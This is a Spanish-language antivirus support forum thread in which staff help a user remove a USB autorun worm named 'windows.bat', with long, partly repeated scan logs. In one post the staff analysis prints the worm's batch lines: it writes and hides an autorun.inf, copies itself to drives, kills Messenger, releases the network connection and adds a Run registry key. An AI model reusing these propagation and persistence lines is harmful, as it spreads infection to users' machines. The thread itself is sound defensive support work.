Windows.bat (SOLUCIONADO)
- arqrafaelgarcia
- Mensajes: 17
- Registrado: 23 Jul 2009, 18:33
Windows.bat (SOLUCIONADO)
Hola perdón espero me puedan ayudar con lo siguiente:
Me conectaron una usb en mi lap que venia infectada de un virus llamado "windows.bat" y lo que hace es crearme muchas copias de mis carpetas y al poner mi usb automaticamente se contagio y pasa lo mismo en mi usb se crean carpetas como mis documentos menu inicio y mas, ademas al iniciar mi lap me marca error de sis32 (perdonen si no tengo errores soy arquitecto no se mucho de pc´s) me blokeo el messenger ademas me inutilizo mi conexión tanto inalambrica como con cable de red, ahorita puedo usar internet por ke sake las direcciones i.p. con otra lap ke tengo pero es un tanto lenta. Bueno ya intente quitarlo con NOD32, cccleaner, antimalware, KISS2009, KAV2009, Avast 2009, entre otros.
Y bien todo esto va a si alguna persona me puede ayudar por favor a eliminar este problema o que me recomiendan hacer....
Muchas gracias.
Arq. Rafael A. García Sánchez.
Me conectaron una usb en mi lap que venia infectada de un virus llamado "windows.bat" y lo que hace es crearme muchas copias de mis carpetas y al poner mi usb automaticamente se contagio y pasa lo mismo en mi usb se crean carpetas como mis documentos menu inicio y mas, ademas al iniciar mi lap me marca error de sis32 (perdonen si no tengo errores soy arquitecto no se mucho de pc´s) me blokeo el messenger ademas me inutilizo mi conexión tanto inalambrica como con cable de red, ahorita puedo usar internet por ke sake las direcciones i.p. con otra lap ke tengo pero es un tanto lenta. Bueno ya intente quitarlo con NOD32, cccleaner, antimalware, KISS2009, KAV2009, Avast 2009, entre otros.
Y bien todo esto va a si alguna persona me puede ayudar por favor a eliminar este problema o que me recomiendan hacer....
Muchas gracias.
Arq. Rafael A. García Sánchez.
Re: Windows.bat
Haz lo siguiente: bajate estos programitas y ejecutalos de forma normal y si no puedes reinicia tu computadora y hazlo de modo seguro, después que termine nos pegas el resultado que se crea en C:infosat.txt
Descargar ElistAra
Descargar Elinotif (complemento de ElistAra deben estar en el mismo lugar)
Descargar ElitriIP
Utilidad es para proteger los discos duros y Pendrives(usb) contra la propagacion de virus atraves de dichas unidades removibles.
Descargar EliPen
Descargar ElistAra
Descargar Elinotif (complemento de ElistAra deben estar en el mismo lugar)
Descargar ElitriIP
Utilidad es para proteger los discos duros y Pendrives(usb) contra la propagacion de virus atraves de dichas unidades removibles.
Descargar EliPen




- msc hotline sat
- Mensajes: 93500
- Registrado: 09 Mar 2004, 20:39
- Ubicación: BARCELONA (ESPAÑA)
- Contactar:
Re: Windows.bat
Y aparte de lo correctamente indicado por flacoroo, si no te detectara dicho fichero "windows.bat" , envianoslo para analizar:
Tras recibirlo/s, lo/s analizaremos e implementaremos su control y eliminacion, si procede, en nuestras utilidades, de lo cual informaremos
saludos
ms, 23-7-2009
Tras recibirlo/s, lo/s analizaremos e implementaremos su control y eliminacion, si procede, en nuestras utilidades, de lo cual informaremos
saludos
ms, 23-7-2009

Antes de preguntar - Normas Basicas - Mensajes Privados - Repetir Temas - Continuar Temas - Titulos del Tema - Antivirus Online
- arqrafaelgarcia
- Mensajes: 17
- Registrado: 23 Jul 2009, 18:33
Re: Windows.bat
Muy bien mañanayo les tendre información de que paso con esto...
Gracias a todos...
Gracias a todos...
- msc hotline sat
- Mensajes: 93500
- Registrado: 09 Mar 2004, 20:39
- Ubicación: BARCELONA (ESPAÑA)
- Contactar:
Re: Windows.bat
Si puedes enviarnos el fichero hoy, hazlo en cuanto puedas, pues por la diferencia horaria entre paises, cuando tu despiertes nosotros ya cerraremos...
En SATINFO, donde analizamos los ficheros y desarrollamos las utilidades, hacemos jornada intensiva de 8 a 15 AM, hora de Barcelona, España, y ya mañana es el último día de trabajo de la plantilla completa, pues empezamos el primer turno de vacaciones y si se necesita implementar en alguna utilidad el control y eliminacion de la muestra, mañana es el último día hasta finales de Agosto...
Así que mira si tienes este WINDOWS.BAT y aun sin probar nada mas, envianoslo como te indicamos, ya veremos si lo controlamos o si hace falta añadirlo.[b][u] Pero te sugiero que lo hagas YA !!![/u] [/b]
saludos
ms, 23-7-2009
ref MX/DF+19.43-99.13
En SATINFO, donde analizamos los ficheros y desarrollamos las utilidades, hacemos jornada intensiva de 8 a 15 AM, hora de Barcelona, España, y ya mañana es el último día de trabajo de la plantilla completa, pues empezamos el primer turno de vacaciones y si se necesita implementar en alguna utilidad el control y eliminacion de la muestra, mañana es el último día hasta finales de Agosto...
Así que mira si tienes este WINDOWS.BAT y aun sin probar nada mas, envianoslo como te indicamos, ya veremos si lo controlamos o si hace falta añadirlo.
saludos
ms, 23-7-2009
ref MX/DF+19.43-99.13

Antes de preguntar - Normas Basicas - Mensajes Privados - Repetir Temas - Continuar Temas - Titulos del Tema - Antivirus Online
- arqrafaelgarcia
- Mensajes: 17
- Registrado: 23 Jul 2009, 18:33
Re: Windows.bat
Perdón por la tardanza... ya envíe el fichero y estoy analizando mi pc.
Gracias en breve les digo como me fue con los consejos...
Gracias en breve les digo como me fue con los consejos...
- msc hotline sat
- Mensajes: 93500
- Registrado: 09 Mar 2004, 20:39
- Ubicación: BARCELONA (ESPAÑA)
- Contactar:
Re: Windows.bat
Recibidas sus muestras, vemos que en la del Windows.bat hay rutinas de propagacion a todas las unidades, típico de los virus de pendrive :
La malicia que tiene este virus es la de infeccion, propagacion y detencion del proceso del Messenger si está activo o se intenta activar, igual que renueva la conexion a internet cada vez que se ejecuta, que es cuando se inserta cualquier pendrive infectado (si no se tiene vacunado con el ELIPEN) y cuando se arranca windows, ya que instala una clave RUN en el registro:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v windows /d
Con el actual ELISTARA ya se detiene pero se pide muestra por tratarse de una nueva variante, de la cual pasamos a implementar control y eliminacion en el ELISTARA DE HOY, 19.10
ms, 24-7-2009
Código: Seleccionar todo
echo [AUTORUN] >>"x:\autorun.inf"
echo shellexecute=windows.bat >>"x:\autorun.inf"
attrib +h "x:\autorun.inf"
xcopy %0 x:\ /e /y /i
TASKKILL /F /IM msnmsgr.exe
ipconfig /release
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v windows /d
Con el actual ELISTARA ya se detiene pero se pide muestra por tratarse de una nueva variante, de la cual pasamos a implementar control y eliminacion en el ELISTARA DE HOY, 19.10
saludosELISTARA:
http://www.zonavirus.com/descargas/elistara.asp
Tras probarlo, reiniciar y postearnos el contenido de C:\infosat.txt para ver el resultado del proceso
ms, 24-7-2009

Antes de preguntar - Normas Basicas - Mensajes Privados - Repetir Temas - Continuar Temas - Titulos del Tema - Antivirus Online
- arqrafaelgarcia
- Mensajes: 17
- Registrado: 23 Jul 2009, 18:33
Re: Windows.bat
Esto es lo que me dio por resultado pero aun así no puedo eliminarlo sigue apareciendo y siempre ke le doy click en mi pc en disco C me sale una ventana negra como tipo msDOS diciendo algo de sistem32 pasa en segundos y ya esta de nuevo ahi el scrip y bat de windows Correre el otro programa ke me dijeron y despues lo intentare nuevamente en modo a prueba de fallos
(24-7-2009 5:32:30 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
C:\WINDOWS\WINDOWS.BAT --> Eliminado
Entrada Eliminada [HKLM\...\Run] "windows"="C:\WINDOWS\windows.bat"
Eliminadas las Paginas de Inicio y de Busqueda del IE
Eliminados Ficheros Temporales del IE
(24-7-2009 5:34:36 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
C:\AUTORUN.INF --> Eliminado, AutoRun.WinBat(inf)
C:\SCRIPT.VBS --> Eliminado, AutoRun.WinBat(vbs)
C:\Documents and Settings\Alfredo\SCRIPT.VBS --> Eliminado, AutoRun.WinBat(vbs)
Nº Total de Directorios: 10647
Nº Total de Ficheros: 81609
Nº de Ficheros Analizados: 26141
Nº de Ficheros Infectados: 3
Nº de Ficheros Limpiados: 3
(24-7-2009 5:50:20 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
C:\AUTORUN.INF --> Eliminado, AutoRun.WinBat(inf)
(24-7-2009 5:50:54) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Acción Directa):
Entrada Eliminada [HKLM\...\Run] "Windows"="C:\WINDOWS\windows.bat"
Eliminado Servicio, "SCardSvr"
Nº Total de Directorios: 10647
Nº Total de Ficheros: 81610
Nº de Ficheros Analizados: 26139
Nº de Ficheros Infectados: 1
Nº de Ficheros Limpiados: 1
(24-7-2009 5:51:41 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 1
Nº Total de Ficheros: 1
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 5:51:43 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 1
Nº Total de Ficheros: 1
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 5:51:44 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 1
Nº Total de Ficheros: 1
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 5:51:51 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "F:\"
F:\AUTORUN.INF --> Eliminado, AutoRun.WinBat(inf)
F:\SCRIPT.VBS --> Eliminado, AutoRun.WinBat(vbs)
Nº Total de Directorios: 623
Nº Total de Ficheros: 363
Nº de Ficheros Analizados: 19
Nº de Ficheros Infectados: 2
Nº de Ficheros Limpiados: 2
Exploración Detenida por el Usuario.
(24-7-2009 06:02:33)
EliPen v1.9 (c)2009 S.G.H. / Satinfo S.L.
------------------------------------------
Detectado C:\Autorun.inf
SHELLEXECUTE=WINDOWS.BAT
C:\Autorun.inf -> Renombrado a .OLD
Unidad C:\ Protegida
Error Creando TEST2.SAT
Unidad D:\ No se Pudo Proteger
Unidad E:\ Protegida
Detectado F:\Autorun.inf
SHELLEXECUTE=WINDOWS.BAT
F:\Autorun.inf -> Renombrado a .OLD
Unidad F:\ Protegida
(24-7-2009 6:03:53 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
C:\WINDOWS\WINDOWS.BAT --> Eliminado
Entrada Eliminada [HKLM\...\Run] "windows"="C:\WINDOWS\windows.bat"
Eliminadas las Paginas de Inicio y de Busqueda del IE
Eliminados Ficheros Temporales del IE
(24-7-2009 6:04:30 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
C:\SCRIPT.VBS --> Eliminado, AutoRun.WinBat(vbs)
Nº Total de Directorios: 10650
Nº Total de Ficheros: 81608
Nº de Ficheros Analizados: 26137
Nº de Ficheros Infectados: 1
Nº de Ficheros Limpiados: 1
(24-7-2009 6:10:35 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
Nº Total de Directorios: 10649
Nº Total de Ficheros: 81602
Nº de Ficheros Analizados: 26136
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 6:13:32 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 3
Nº Total de Ficheros: 2
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 6:13:33 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 3
Nº Total de Ficheros: 2
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 6:13:40 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "F:\"
Nº Total de Directorios: 7601
Nº Total de Ficheros: 365
Nº de Ficheros Analizados: 20
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 7:01:17 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
Nº Total de Directorios: 10657
Nº Total de Ficheros: 81910
Nº de Ficheros Analizados: 26196
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 7:06:56 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
C:\WINDOWS\WINDOWS.BAT --> Eliminado
Entrada Eliminada [HKLM\...\Run] "windows"="C:\WINDOWS\windows.bat"
(24-7-2009 5:32:30 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
C:\WINDOWS\WINDOWS.BAT --> Eliminado
Entrada Eliminada [HKLM\...\Run] "windows"="C:\WINDOWS\windows.bat"
Eliminadas las Paginas de Inicio y de Busqueda del IE
Eliminados Ficheros Temporales del IE
(24-7-2009 5:34:36 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
C:\AUTORUN.INF --> Eliminado, AutoRun.WinBat(inf)
C:\SCRIPT.VBS --> Eliminado, AutoRun.WinBat(vbs)
C:\Documents and Settings\Alfredo\SCRIPT.VBS --> Eliminado, AutoRun.WinBat(vbs)
Nº Total de Directorios: 10647
Nº Total de Ficheros: 81609
Nº de Ficheros Analizados: 26141
Nº de Ficheros Infectados: 3
Nº de Ficheros Limpiados: 3
(24-7-2009 5:50:20 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
C:\AUTORUN.INF --> Eliminado, AutoRun.WinBat(inf)
(24-7-2009 5:50:54) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Acción Directa):
Entrada Eliminada [HKLM\...\Run] "Windows"="C:\WINDOWS\windows.bat"
Eliminado Servicio, "SCardSvr"
Nº Total de Directorios: 10647
Nº Total de Ficheros: 81610
Nº de Ficheros Analizados: 26139
Nº de Ficheros Infectados: 1
Nº de Ficheros Limpiados: 1
(24-7-2009 5:51:41 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 1
Nº Total de Ficheros: 1
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 5:51:43 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 1
Nº Total de Ficheros: 1
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 5:51:44 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 1
Nº Total de Ficheros: 1
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 5:51:51 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "F:\"
F:\AUTORUN.INF --> Eliminado, AutoRun.WinBat(inf)
F:\SCRIPT.VBS --> Eliminado, AutoRun.WinBat(vbs)
Nº Total de Directorios: 623
Nº Total de Ficheros: 363
Nº de Ficheros Analizados: 19
Nº de Ficheros Infectados: 2
Nº de Ficheros Limpiados: 2
Exploración Detenida por el Usuario.
(24-7-2009 06:02:33)
EliPen v1.9 (c)2009 S.G.H. / Satinfo S.L.
------------------------------------------
Detectado C:\Autorun.inf
SHELLEXECUTE=WINDOWS.BAT
C:\Autorun.inf -> Renombrado a .OLD
Unidad C:\ Protegida
Error Creando TEST2.SAT
Unidad D:\ No se Pudo Proteger
Unidad E:\ Protegida
Detectado F:\Autorun.inf
SHELLEXECUTE=WINDOWS.BAT
F:\Autorun.inf -> Renombrado a .OLD
Unidad F:\ Protegida
(24-7-2009 6:03:53 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
C:\WINDOWS\WINDOWS.BAT --> Eliminado
Entrada Eliminada [HKLM\...\Run] "windows"="C:\WINDOWS\windows.bat"
Eliminadas las Paginas de Inicio y de Busqueda del IE
Eliminados Ficheros Temporales del IE
(24-7-2009 6:04:30 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
C:\SCRIPT.VBS --> Eliminado, AutoRun.WinBat(vbs)
Nº Total de Directorios: 10650
Nº Total de Ficheros: 81608
Nº de Ficheros Analizados: 26137
Nº de Ficheros Infectados: 1
Nº de Ficheros Limpiados: 1
(24-7-2009 6:10:35 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
Nº Total de Directorios: 10649
Nº Total de Ficheros: 81602
Nº de Ficheros Analizados: 26136
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 6:13:32 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 3
Nº Total de Ficheros: 2
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 6:13:33 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 3
Nº Total de Ficheros: 2
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 6:13:40 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "F:\"
Nº Total de Directorios: 7601
Nº Total de Ficheros: 365
Nº de Ficheros Analizados: 20
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 7:01:17 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
Nº Total de Directorios: 10657
Nº Total de Ficheros: 81910
Nº de Ficheros Analizados: 26196
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 7:06:56 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
C:\WINDOWS\WINDOWS.BAT --> Eliminado
Entrada Eliminada [HKLM\...\Run] "windows"="C:\WINDOWS\windows.bat"
- msc hotline sat
- Mensajes: 93500
- Registrado: 09 Mar 2004, 20:39
- Ubicación: BARCELONA (ESPAÑA)
- Contactar:
Re: Windows.bat
Pues como que ya tenemos la muestra que nos has enviado, no hace falta que envies la que se pide en el infosat, y como te he dicho, en el ELISTARA 19.10 de hoy vendrá controlado incluso esta nueva variante, y cuando lo descargues y lo pruebes, te eliminará los restos, aunque ahora, tras reiniciar, ya no se pondrá en marcha.
Cuando lo hayas hecho, nos posteas dicho informe y nos cuentas el rezultado, y dinos entonces si ya no persiste ninguna anomalia y podemos dar por solucionado el Tema, gracias
saludos
ms, 24-7-2009
Cuando lo hayas hecho, nos posteas dicho informe y nos cuentas el rezultado, y dinos entonces si ya no persiste ninguna anomalia y podemos dar por solucionado el Tema, gracias
saludos
ms, 24-7-2009

Antes de preguntar - Normas Basicas - Mensajes Privados - Repetir Temas - Continuar Temas - Titulos del Tema - Antivirus Online
- arqrafaelgarcia
- Mensajes: 17
- Registrado: 23 Jul 2009, 18:33
Re: Windows.bat
Bien ya descargué el nvo. archivo estoy analizando pero uno de mis usb tiene copiados muchos ficheros ke saco de la pc ke me infecto y tarda mucho intente eliminarlos manualmente pero no me deja y tampoco formatear la unidad por lo tanto tarda un poco, en tanto este terminado el proceso reinicio mi pc y pego el nvo resultado gracias.
- msc hotline sat
- Mensajes: 93500
- Registrado: 09 Mar 2004, 20:39
- Ubicación: BARCELONA (ESPAÑA)
- Contactar:
Re: Windows.bat
No sé que habrás bajado, pero el ELISTARA 19.10 aun lo estamos haciendo y hasta las 15 h no lo subiremos a esta web... :roll:
Recuerda entonces testear con ella los pendrives, y unidades extraibles, pues seguro que estarán infectadas.
saludos
ms, 24-7-2009
Recuerda entonces testear con ella los pendrives, y unidades extraibles, pues seguro que estarán infectadas.
saludos
ms, 24-7-2009

Antes de preguntar - Normas Basicas - Mensajes Privados - Repetir Temas - Continuar Temas - Titulos del Tema - Antivirus Online
- arqrafaelgarcia
- Mensajes: 17
- Registrado: 23 Jul 2009, 18:33
Re: Windows.bat
Muy perdón es que venia una de las respuestas con un enlace y descargue lo del enlace entonces esperare el archivo nvo. Gracias. Dormiré un poco. 

- msc hotline sat
- Mensajes: 93500
- Registrado: 09 Mar 2004, 20:39
- Ubicación: BARCELONA (ESPAÑA)
- Contactar:
Re: Windows.bat
A buena hora !, anda a dormir que ya es hora, que descanses, y para cuando despiertes espero que ya tendrás subida dicha version 19.10
saludos
ms, 24-7-2009
saludos
ms, 24-7-2009

Antes de preguntar - Normas Basicas - Mensajes Privados - Repetir Temas - Continuar Temas - Titulos del Tema - Antivirus Online
- arqrafaelgarcia
- Mensajes: 17
- Registrado: 23 Jul 2009, 18:33
Re: Windows.bat
Muy bien ya ando por aquí listo para esa actualización
- msc hotline sat
- Mensajes: 93500
- Registrado: 09 Mar 2004, 20:39
- Ubicación: BARCELONA (ESPAÑA)
- Contactar:
Re: Windows.bat
Pues como hemos dicho ya está disponible hace 1 hora ...
(justo antes de que despertaras...
)
saludos
ms, 24-7-2009
(justo antes de que despertaras...



saludos
ms, 24-7-2009

Antes de preguntar - Normas Basicas - Mensajes Privados - Repetir Temas - Continuar Temas - Titulos del Tema - Antivirus Online
- arqrafaelgarcia
- Mensajes: 17
- Registrado: 23 Jul 2009, 18:33
Re: Windows.bat
Nuevamente muchas gracias. Y no es amenaza pero estaremos en contacto! Saludos desde México!
_____
Nº Total de Directorios: 7718
Nº Total de Ficheros: 222
Nº de Ficheros Analizados: 12
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 7:59:15 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "D:\"
Nº Total de Directorios: 2
Nº Total de Ficheros: 10
Nº de Ficheros Analizados: 7
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 8:02:55 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
Eliminadas las Paginas de Inicio y de Busqueda del IE
Eliminados Ficheros Temporales del IE
(24-7-2009 14:04:41 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
E:\DESKTOP.INI --> Eliminado (Fichero Complementario).
F:\DESKTOP.INI --> Eliminado (Fichero Complementario).
Eliminadas las Paginas de Inicio y de Busqueda del IE
Eliminados Ficheros Temporales del IE
(24-7-2009 14:04:53 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
C:\Documents and Settings\Alfredo\WINDOWS.BAT --> Eliminado, AutoRun.WinBat
C:\RECYCLER\S-1-5-21-4002053713-390158461-902960635-1005\DC1.BAT --> Eliminado, AutoRun.WinBat
Nº Total de Directorios: 10664
Nº Total de Ficheros: 82047
Nº de Ficheros Analizados: 26206
Nº de Ficheros Infectados: 2
Nº de Ficheros Limpiados: 2
(24-7-2009 14:17:17 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 3
Nº Total de Ficheros: 8
Nº de Ficheros Analizados: 3
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 14:17:25 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "F:\"
Nº Total de Directorios: 5
Nº Total de Ficheros: 7
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 14:18:00) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Acción Directa):
(24-7-2009 14:18:03) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
Nº Total de Directorios: 10664
Nº Total de Ficheros: 82052
Nº de Ficheros Analizados: 24635
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 14:19:57) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 3
Nº Total de Ficheros: 8
Nº de Ficheros Analizados: 3
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 14:20:02) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Exploración):
Explorando "F:\"
Nº Total de Directorios: 5
Nº Total de Ficheros: 7
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
- arqrafaelgarcia
- Mensajes: 17
- Registrado: 23 Jul 2009, 18:33
Re: Windows.bat
Gracias, pego de nuevo mi ultimo informe para que también quede registro en este foro.
_____________________________
Nº Total de Directorios: 7718
Nº Total de Ficheros: 222
Nº de Ficheros Analizados: 12
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 7:59:15 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "D:\"
Nº Total de Directorios: 2
Nº Total de Ficheros: 10
Nº de Ficheros Analizados: 7
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 8:02:55 (GMT))
EliStartPage v19.09 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 23 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
Eliminadas las Paginas de Inicio y de Busqueda del IE
Eliminados Ficheros Temporales del IE
(24-7-2009 14:04:41 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
E:\DESKTOP.INI --> Eliminado (Fichero Complementario).
